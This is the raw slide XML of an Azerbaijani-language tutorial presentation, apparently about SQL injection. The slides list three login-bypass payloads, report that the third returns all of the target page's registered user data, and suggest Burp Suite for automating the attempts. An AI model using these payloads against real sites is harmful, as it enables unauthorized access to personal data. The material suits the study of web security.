        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="151912" y="138364"/>
            <a:ext cx="8088325" cy="4483331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048707" name="Mətn Qutusu 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8240237" y="169724"/>
            <a:ext cx="3715057" cy="3825241"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tapdığımız kodlardan hər biri uğurlu nəticə verməyə bilər bunun görə kodları tək-tək </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yoxluyacayıq</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048708" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291830" y="4653055"/>
            <a:ext cx="11099259" cy="2186941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’or 1=1 or ‘’ ’’=‘’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin’’ ) or (‘’1’’=‘’1’’- -</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ ‘ Or ‘ = ‘Or ‘ ’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ə .s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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183" name="Şəkil 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="867" t="10970" r="10978" b="45574"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="240055" y="4707464"/>
            <a:ext cx="7268367" cy="1846400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="228600" cap="sq" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:innerShdw blurRad="76200">
              <a:srgbClr val="000000"/>
            </a:innerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097184" name="Şəkil 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="240055" y="304136"/>
            <a:ext cx="7268367" cy="4063583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="228600" cap="sq" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:innerShdw blurRad="76200">
              <a:srgbClr val="000000"/>
            </a:innerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048709" name="Mətn Qutusu 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7850221" y="304136"/>
            <a:ext cx="4101724" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Açığın </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>olduğu shifəyə giririk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048710" name="Düzbucaqlı 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3142034" y="3015574"/>
            <a:ext cx="690664" cy="126460"/>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11" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7850221" y="1666924"/>
            <a:ext cx="3900792" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hədəf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shifədə istifadəçinin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sıra nömrəsi, ad və yaş məlumatını görürük</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048712" name="Mətn Qutusu 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7850221" y="4221469"/>
            <a:ext cx="4101724" cy="2225041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kodlarımızı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘’=‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>işarəsinnən</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sonrakı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bölmyə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yazacayıq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="36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185" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1213" t="11996" r="3878" b="43081"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="124449" y="118434"/>
            <a:ext cx="7753453" cy="1780162"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097186" name="Şəkil 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="95" t="9475" r="2348" b="58265"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="124450" y="2201733"/>
            <a:ext cx="7873188" cy="1575881"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097187" name="Şəkil 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="11523" r="2350" b="22053"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="64580" y="4080751"/>
            <a:ext cx="7873189" cy="2485417"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048713" name="Mətn Qutusu 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8142051" y="118434"/>
            <a:ext cx="3925499" cy="6740307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’or 1=1 or ‘’ ’’=‘’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İlk kodumuzu yazırıq və heç bir nəticənin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>çıxmadığını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> görürük</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin’’ ) or (‘’1’’=‘’1’’- -</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İkinci kodu yazırıq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yənə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> heç bir nəticə vermir</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ ‘ Or ‘ = ‘Or ‘ ’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Üçüncü kodu yazdıqda</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shifə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>də qeydiyyatda olan bütün məlumatlar qarşımıza çıxır yəni nəticə uğurlu olur </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="az-Latn-AZ" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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48714" name="Mətn Qutusu 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="136187"/>
            <a:ext cx="12192000" cy="1869441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kodları əl ilə tək-tək girmək çətin olduğu üçün əlavə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vasitəsi ilə işimizi rahatlaşdıra bilərik buna üçün </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KaliLinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> da qurulu olaraq gələn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> istifadə edə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bilərik.İstifadə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> etmək üçün </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuitlə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brauzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> arasında bağlantı qurmaq lazımdır.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İstifadə etdiyimiz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brauzerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bəzi parametrlərini deyişirik.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097188" name="Şəkil 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="3757" b="33656"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
